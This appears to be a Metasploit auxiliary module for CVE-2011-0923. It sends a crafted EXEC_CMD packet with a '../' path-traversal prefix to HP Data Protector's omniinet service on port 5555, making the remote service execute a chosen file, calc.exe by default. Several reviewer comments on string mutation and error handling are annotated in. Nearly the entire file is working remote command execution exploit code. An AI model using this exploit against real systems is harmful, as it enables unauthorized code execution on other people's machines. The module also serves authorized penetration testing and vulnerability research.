
hp_data_protector_cmd.rb 2.8KB

  1. ##
  2. # This module requires Metasploit: https://metasploit.com/download
  3. # Current source: https://github.com/rapid7/metasploit-framework
  4. ##
# Auxiliary module that opens one TCP connection to an HP Data Protector
# omniinet service, sends a single EXEC_CMD packet built in #run, and prints
# whatever the service answers. It has no check method and no payload stage;
# the command is the file path taken from the CMD option (see the description
# for the behaviour of the remote FindFirstFileW()/CreateProcess() calls).
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp

  # Module metadata plus the two options this module reads: RPORT (default 5555)
  # and CMD, the file to execute, which the description says is resolved
  # relative to C:\ on the target.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'HP Data Protector 6.1 EXEC_CMD Command Execution',
      'Description' => %q{
        This module exploits HP Data Protector's omniinet process, specifically
        against a Windows setup.
        When an EXEC_CMD packet is sent, omniinet.exe will attempt to look
        for that user-supplied filename with kernel32!FindFirstFileW(). If the file
        is found, the process will then go ahead execute it with CreateProcess()
        under a new thread. If the filename isn't found, FindFirstFileW() will throw
        an error (0x03), and then bails early without triggering CreateProcess().
        Because of these behaviors, if you try to supply an argument, FindFirstFileW()
        will look at that as part of the filename, and then bail.
        Please note that when you specify the 'CMD' option, the base path begins
        under C:\.
      },
      'References' =>
        [
          [ 'CVE', '2011-0923' ],
          [ 'OSVDB', '72526' ],
          [ 'ZDI', '11-055' ],
          [ 'URL', 'http://hackarandas.com/blog/2011/08/04/hp-data-protector-remote-shell-for-hpux' ]
        ],
      'Author' =>
        [
          'ch0ks', # poc
          'c4an', # msf poc (linux)
          'wireghoul', # Improved msf (linux)
          'sinn3r'
        ],
      'License' => MSF_LICENSE,
      'DisclosureDate' => "Feb 7 2011"
    ))

    register_options(
      [
        Opt::RPORT(5555),
        OptString.new("CMD", [true, 'File to execute', 'Windows\System32\calc.exe'])
      ])
  end

  # Builds the EXEC_CMD packet from fixed byte sequences, a random 4-character
  # "user" string, three literal "NTAUTHORITY" fields, a directory-traversal
  # prefix and the CMD option, then sends it once and prints any reply.
  # The meaning of the individual header bytes is not documented in this file;
  # their order and values are reproduced exactly and should not be reflowed.
  def run
    # NOTE(review): `<<` mutates the String object returned by datastore['CMD']
    # in place. Unless the datastore hands back a fresh copy, the stored option
    # grows by 26 bytes every time #run is invoked on this module instance,
    # so a second run sends a different packet than the first. Working on a
    # copy (e.g. `datastore['CMD'].dup`) would avoid that -- confirm datastore
    # semantics before changing it.
    cmd = datastore['CMD']
    # 25 NUL bytes of padding followed by a newline terminate the command field.
    cmd << "\x00"*25
    cmd << "\n"

    # Random alphabetic token used as the "user" value; it appears twice in the
    # header and once more further down the packet.
    user = Rex::Text.rand_text_alpha(4)

    packet = "\x00\x00\x00\xa4\x20\x32\x00\x20"
    packet << user*2
    packet << "\x00\x20\x30\x00\x20"
    packet << "SYSTEM"
    packet << "\x00\x20\x63\x34\x61\x6e"
    packet << "\x20\x20\x20\x20\x20\x00\x20\x43\x00\x20\x32\x30\x00\x20"
    packet << user
    packet << "\x20\x20\x20\x20\x00\x20"
    packet << "\x50\x6f\x63"
    packet << "\x00\x20"
    packet << "NTAUTHORITY"
    packet << "\x00\x20"
    packet << "NTAUTHORITY"
    packet << "\x00\x20"
    packet << "NTAUTHORITY"
    packet << "\x00\x20\x30\x00\x20\x30\x00\x20"
    # Ten "../" components precede the CMD value, so CMD is interpreted
    # relative to the drive root (the description says C:\).
    packet << "../../../../../../../../../../"
    packet << cmd

    begin
      print_status("#{rhost}:#{rport} - Sending command...")
      connect
      sock.put(packet)
      # Single read; the module does not parse the response, it only echoes
      # it when something came back.
      res = sock.get_once
      # Style: `res && !res.empty?` is the idiomatic spelling of this guard.
      print_status(res.to_s) if res and not res.empty?
    # NOTE(review): a bare rescue catches every StandardError, including
    # failures raised after the connection succeeded (sock.put / get_once),
    # and reports all of them as "Unable to connect" without logging the
    # exception. Rescuing ::Rex::ConnectionError separately, or including the
    # exception message in the error line, would make failures diagnosable.
    rescue
      print_error("#{rhost}:#{rport} - Unable to connect")
    ensure
      # Runs even when connect itself raised; relies on
      # Msf::Exploit::Remote::Tcp#disconnect tolerating an unopened socket
      # (not visible here -- assumed).
      disconnect
    end
  end
end